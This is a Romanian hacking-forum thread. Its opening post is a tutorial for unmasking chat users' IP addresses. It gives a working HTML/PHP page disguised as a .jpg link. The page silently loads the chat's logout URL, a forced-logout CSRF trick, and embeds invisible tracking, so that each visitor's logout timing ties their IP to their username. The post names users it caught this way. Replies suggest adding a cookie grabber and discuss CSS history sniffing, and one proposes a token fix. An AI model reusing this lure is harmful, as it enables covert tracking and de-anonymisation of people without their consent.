Simple Social Engineering 2 | RST chat users IP fingerprinting

[carlosbh2]

Sa ne imaginam ca cineva doreste sa afle date despre userii din chatul RST. Ip-uri, browser, sistem de operare, poate si un mic history hacking. In acest tutorial consideram ca targetul sunt ip-urile si ne vom folosi doar de functiile chatului, nu si cele ale forumului.

Relativ treaba este simpla. Dai un link de-al tau pe chat si vezi de la ce ip-uri iti vin vizitele. Dar cum stii carui user RST ii este atribuit ip-ul logat de tine? Daca din 20 de useri prezenti pe chat dau 5 useri click pe link vei avea 5 ip-uri logate, dar nu stii care din cei 20 au dat click si cine are respectivele ip-uri.

Procedeul urmat de mine:

1. Am creeat pe un site un folder cu extensia .jpg.

2. Am adaugat in folder un fisier index.php

3. In fisierul index.php am pus urmatoarele

<html>
<img src="http://thefunnyplace.net/wp-content/uploads/2013/10/The-evolution-of-Bianca-Dragusanu-From-Romania.jpg"></img>
<img src="https://rstforums.com/chat/?logout=true" width="0" height="0"></img>
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
var sc_project=9525865; 
var sc_invisible=1; 
var sc_security="8e3cdbce"; 
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="web analytics"
href="http://statcounter.com/" target="_blank"><img
class="statcounter"
src="http://c.statcounter.com/9525865/0/8e3cdbce/1/"
alt="web analytics"></a></div></noscript>
<!-- End of StatCounter Code for Default Guide -->
</html>

4. Am postat linkul catre folderul meu pe chatul RST.

METODOLOGIE

Folderul cu extensia .jpg face linkul sa para inofensiv

Codul meu din index.php afiseaza intr-adevar o imagine dar apeleaza fara vizibilitate si fara interventia vizitatorului si linkul https://rstforums.com/chat/?logout=true

REZULTATE

Observati cum tedeus, nedo, Mandrake1942 si ENCODED se delogheaza si se logheaza pe chat in cateva secunde. Asta se intampla cand accesezi linkul https://rstforums.com/chat/?logout=true din alta fereastra decat cea a chatului.

Acum hai sa ne uitam peste statisticile site-ului nostru capcana:

Ip-urile lor s-au salvat in ordinea in care ei au accesat poza fake (in screenshot de jos in sus). Stim exact ora si secunda la care fiecare a dat click pe link pentru ca se delogheaza si se logheaza de pe chat, ceea ce ne anunta ca au intrat pe url-ul capcana. Statisticile mele sunt oferite de statcounter.com si exista o marja de eroare de 20 de secunde, dar un script custom pentru logarea datelor poate sa scada marja de eroare la maxim 2 secunde.

Folosind ordinea de delogare din chat sau ora, minutul si secunda la care au dat click pe link, putem afla foarte usor cine are ip-ul Y si cine are ip-ul Z. Pe langa toate acestea mai aflam si versiunile de browser, OS, oras, poate chiar si site-urile pe care le acceseaza daca folosim un script de history hacking.

[Guest Kovalski]

Mda, bine ai venit in 2009, din pacate acum suntem in 2014, vino cu ceva mai nou si mai interesant.

[tedeus]

Minunat. Felicitari.

Din pacate.... Pe milenium este doar vpn-ul... daca ai nevoie de print ti-l dau cu mare drag. So...

//*Late edit:

Ne poti arata si noua unde este acel minunat Social Engineering??? E fain ca ai reusit CEVA(multi nici macar nu se chinuiesc - pentru asta felicitari), dar nu vad Social Engineering in ce ai facut. Din pacate, in aceasta perioada, chiar nu am cum dar, pe viitor, promit sa postez niste forme de Social Engineering in realul sens al cuvantului.

Edited January 9, 2014 by tedeus

[carlosbh2]

@ps-axl o sa instalez eyeos pe un server si o sa-l anunt ca proiect rst, iar dupa o luna sau doua luni o sa anunt oamenii ca si-au pierdut toate fisierele si ca am inchis serviciul. Ce zici de ideea asta? Oh wait...

@tedeus nu conteaza de unde e ip-ul. Este un tutorial. Nu ma intereseaza cu adevarat ce ip ai. Este vorba de o metoda foarte simpla anti-privacy folosind un feature al site-ului. Citeste titlul: Simple Social Engineering.

Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme.

Edited January 9, 2014 by carlosbh2

[Silviu]

Trebuie sa repare Nytro faza cu delogarea, ca a devenit de cacat. Un referer check asupra scriptului care face delogarea ar fi suficient, in cazul in care link-ul e mascat prin alt link, dar un token ar fi solutia cea mai optima.

[Bebe]

Bagi si un cookie grabber si ai terminat treaba.

[Dragos]

Pe langa toate acestea mai aflam si versiunile de browser, OS, oras, poate chiar si site-urile pe care le acceseaza daca folosim un script de history hacking.

Nu mai ai sanse sa folosesti pe browserele noi xshm daca la asta te gandesti.

[carlosbh2]

Nu mai ai sanse sa folosesti pe browserele noi xshm daca la asta te gandesti.

Ma refer la history hacking/css history hacking. Asta inca functioneaza pe anumite browsere updatate la zi.

[bcman]

CSS History Hacking cred ca mai functioneaza doar pe Opera si IE9. Firefox a rezolvat-o demult, la fel si Chrome.

[carlosbh2]

Functioneaza aproape pentru fiecare browser in parte (scripturi diferite cu abordari diferite). Am testat acum cateva saptamani scripturi publice care functionau si cu ff si cu chrome.

[Cifre]

Îmi pare r?u c? sunt mai prost dar nici eu nu înteleg unde este SE.. Idea nu este a ta, a fost pus? în practic? prima dat? de mine cu un link bit.ly motiv pentru care am luat kick & ban de la un fost moderator dup? care a venit askwrite cu un rewrite rule ?i a f?cut ?i el chestia cu .extensie ?i la nu mult timp dup? Acidripp a ad?ugat ?i statistici..

Chestia asta se f?cea acum foarte mult timp pe chat.. dar a murit faza. Cum zicea ?i tex ”Gluma e gluma, e bun? dar nu repetat? în continu.„

?i oricum, cu ce te înc?lze?te pe tine c? ai IP-ul ?i ceva informatii despre persoanele de pe chat? Nu ?tiu dac? e?ti con?tient dar majoritatea au 2 VPN-uri pornite în acela?i timp ?i vreo 3-4 laptop-uri de rezerv? în frigider.. Eu personal nu era nevoie de atât t?mb?l?u... îl cereai ?i ?i-l d?deam..

Social engineering, in the context of information security, refers to psychological manipulation of people into performing actions or divulging confidential information. A type of confidence trick for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme.

Ce încerci tu s? faci acolo nu este SE, dac? faci rost de ni?te informatii asta nu înseamn? c? faci SE. SE atunci când manipulezi pe cineva din toate punctele de vedere pentru a ob?ine un anumit tip de informa?ie.

Edited January 9, 2014 by Cifre

[Acidripp]

Deci cer sa i se dea ban plagiatorului asta!

Multumesc.

acidripp.com/rst.zip

[carlosbh2]

Cifre habar nu aveam ce ai facut tu si sunt sigur ca ai facut ceva doar de amuzament ca sa vezi cum iese si intra lumea de pe chat, nu ca sa faci vreo tentativa de data harvesting. Cat despre intrebarea "ce poti face cu un ip al unui user" gandeste-te ca mai alaltaieri un retardat vindea teme de wordpress luate pe naspa si era prezent si pe chat in acelasi timp. Daca nu intelegi logica iti fac desenul in paint in 2 minute. Nu mai incercati sa o frecati la icre ca nu e SE. Face parte din SE toata ziua.

[TheOne]

Mda, bine ai venit in 2009, din pacate acum suntem in 2014, vino cu ceva mai nou si mai interesant.

Taci draq ca te faci si de cacat, broscoi mincinos aka RETEAUA TEAM

ON: Bravo! Continua asa..